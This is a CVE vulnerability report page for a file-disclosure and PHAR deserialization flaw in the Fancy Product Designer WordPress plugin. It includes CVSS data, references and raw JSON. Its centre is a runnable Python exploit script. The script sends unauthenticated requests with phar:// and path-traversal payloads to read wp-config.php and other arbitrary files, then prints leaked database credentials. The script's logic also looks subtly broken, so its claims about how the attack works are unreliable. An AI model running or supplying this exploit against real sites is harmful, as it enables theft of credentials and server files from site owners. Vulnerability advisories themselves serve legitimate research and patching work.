Security Vulnerability Report
CVE-2025-13439 CVSS 5.9 MEDIUM

CVE-2025-13439

Published: 2025-12-16 08:15:52
Last Modified: 2026-04-15 00:35:42

Description

The Fancy Product Designer plugin for WordPress is vulnerable to Information Disclosure and PHAR Deserialization in all versions up to, and including, 6.4.8. This is due to insufficient validation of user-supplied input in the 'url' parameter of the 'fpd_custom_uplod_file' AJAX action, which flows directly into the 'getimagesize' function without sanitization. This makes it possible for unauthenticated attackers to read arbitrary sensitive files from the server, including wp-config.php.

CVSS Details

CVSS Score
5.9
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Fancy Product Designer WordPress plugin <= 6.4.8

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-13439 PoC - Fancy Product Designer Information Disclosure
# Target: WordPress site with Fancy Product Designer plugin <= 6.4.8
import requests
import sys


def cve_2025_13439_poc(target_url):
    """
    Information Disclosure PoC for CVE-2025-13439
    This exploits the lack of validation in fpd_custom_uplod_file AJAX action
    """
    # Target endpoint for AJAX action
    ajax_url = f"{target_url}/wp-admin/admin-ajax.php"

    # Construct malicious payload to read wp-config.php
    # Using phar:// wrapper to trigger deserialization
    payload = {
        'action': 'fpd_custom_uplod_file',
        'url': 'phar://../../../../wp-config.php'
    }

    try:
        print(f"[*] Sending request to {ajax_url}")
        print(f"[*] Payload: {payload}")
        response = requests.post(ajax_url, data=payload, timeout=30)

        if response.status_code == 200:
            print("[+] Request successful")
            print(f"[*] Response length: {len(response.text)} bytes")
            # Check if sensitive data was leaked
            if 'DB_NAME' in response.text or 'DB_USER' in response.text:
                print("[!] VULNERABLE - wp-config.php content leaked!")
                print(response.text[:500])
                return True
            else:
                print("[*] Response received, manual verification needed")
                print(response.text[:200])
        else:
            print(f"[-] Request failed with status: {response.status_code}")
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")

    return False


# Alternative PoC - Direct file read via path traversal
def alternative_poc(target_url, file_path):
    """
    Alternative PoC using path traversal
    """
    ajax_url = f"{target_url}/wp-admin/admin-ajax.php"

    # Path traversal to read arbitrary files
    payload = {
        'action': 'fpd_custom_uplod_file',
        'url': f'../../../../{file_path}'
    }

    try:
        response = requests.post(ajax_url, data=payload, timeout=30)
        if response.status_code == 200:
            return response.text
    except requests.exceptions.RequestException:
        # Network or HTTP-level failure: report no result rather than crashing
        return None

    # Non-200 response: nothing usable was returned
    return None


if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python cve-2025-13439.py <target_url>")
        print("Example: python cve-2025-13439.py http://example.com")
        sys.exit(1)

    target = sys.argv[1].rstrip('/')
    cve_2025_13439_poc(target)
```

References

https://support.fancyproductdesigner.com/support/discussions/topics/13000036024
https://www.wordfence.com/threat-intel/vulnerabilities/id/4fd6df9d-2963-44b1-bc4e-e53eda97a2a9?source=cve

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-13439",
    "sourceIdentifier": "[email protected]",
    "published": "2025-12-16T08:15:51.753",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The Fancy Product Designer plugin for WordPress is vulnerable to Information Disclosure and PHAR Deserialization in all versions up to, and including, 6.4.8. This is due to insufficient validation of user-supplied input in the 'url' parameter of the 'fpd_custom_uplod_file' AJAX action, which flows directly into the 'getimagesize' function without sanitization. This makes it possible for unauthenticated attackers to read arbitrary sensitive files from the server, including wp-config.php."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
            "baseScore": 5.9,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "HIGH",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.2,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-200"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://support.fancyproductdesigner.com/support/discussions/topics/13000036024",
        "source": "[email protected]"
      },
      {
        "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/4fd6df9d-2963-44b1-bc4e-e53eda97a2a9?source=cve",
        "source": "[email protected]"
      }
    ]
  }
}
```